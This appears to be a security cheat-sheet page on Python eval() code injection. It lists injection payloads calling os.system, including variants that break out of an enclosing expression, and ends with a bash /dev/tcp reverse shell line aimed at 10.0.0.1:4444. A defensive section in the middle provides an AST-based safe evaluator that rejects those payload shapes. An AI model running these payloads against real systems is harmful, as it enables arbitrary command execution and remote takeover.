Python Eval Code Execution
Last modified: 2023-04-11
Python's built-in eval() evaluates a string as a Python expression, so passing it untrusted input leads to arbitrary code execution.
Investigation
eval(text)
eval(f"5 + {num}")
If the script passes user-controlled input into the "text" variable (or, in the second form, into "num"), that input is evaluated as Python and arbitrary code can be injected.
Arbitrary Code Execution
Often the input is embedded inside a larger expression (as in the f-string form above), so the payload must first close that surrounding expression before the injected call is evaluated.
__import__('os').system('id')
Bypass another expression in eval:
),__import__('os').system('id')
'),__import__('os').system('id')
},__import__('os').system('id')
),__import__('os').system('id')#
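The two patterns above (eval(text) on raw input, and a payload that first closes the surrounding expression) both exist because eval() accepts the whole Python grammar. The fix on the defending side is to never hand untrusted text to eval() at all: parse it with the ast module and walk only the node types the feature actually needs. The following is an added example, not code from this page or any project; vulnerable_add, hardened_add, safe_arith_eval and rejects are names chosen here, and the inputs fed to them are constructed.

```python
import ast
import operator

# Operators the restricted evaluator accepts. Pow is deliberately left out:
# an unbounded 9**9**9 is a denial-of-service vector in its own right.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
}
_UNARY_OPS = {
    ast.UAdd: operator.pos,
    ast.USub: operator.neg,
}


class UnsafeExpression(ValueError):
    """Raised when the input contains anything but arithmetic on numeric literals."""


def _eval_node(node):
    # Plain int/float literals only (bool is an int subclass, so exclude it).
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)) \
            and not isinstance(node.value, bool):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        return _BIN_OPS[type(node.op)](_eval_node(node.left), _eval_node(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    # ast.Name, ast.Attribute, ast.Call, ast.Tuple, ast.BoolOp ... all land here.
    # This is what keeps __import__('os').system(...) from ever being executed:
    # the tree is inspected, never evaluated by the interpreter.
    raise UnsafeExpression(f"disallowed syntax: {type(node).__name__}")


def safe_arith_eval(text: str):
    """Evaluate a simple arithmetic expression without calling eval()."""
    try:
        tree = ast.parse(text, mode="eval")  # mode="eval" refuses statements outright
    except SyntaxError as exc:
        raise UnsafeExpression(f"not an expression: {exc.msg}") from exc
    return _eval_node(tree.body)


def vulnerable_add(num: str):
    """The pattern from the page: user input is interpolated straight into eval()."""
    return eval(f"5 + {num}")


def hardened_add(num: str):
    """Same feature, but the input is parsed and only arithmetic is allowed."""
    return safe_arith_eval(f"5 + ({num})")


def rejects(num: str) -> bool:
    """True if hardened_add refuses the input instead of evaluating it."""
    try:
        hardened_add(num)
    except UnsafeExpression:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs: a benign one, then the shapes of payload shown on the page.
    print(hardened_add("3"))                                   # 8
    for sample in ["__import__('os').system('id')",
                   "1),__import__('os').system('id')",
                   "x + 1",
                   "(1).__class__"]:
        print(repr(sample), "rejected" if rejects(sample) else "EVALUATED")
```

For inputs that are pure literals (numbers, strings, lists, dicts) the standard library's ast.literal_eval is the simpler choice; it is used here only indirectly because it does not evaluate arithmetic, which is the one feature the page's eval(f"5 + {num}") needed. In code review, any eval()/exec() whose argument is built from request data, a config file or an environment variable should be treated as a finding regardless of what string filtering sits in front of it.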
Reverse Shell
__import__('os').system('bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"')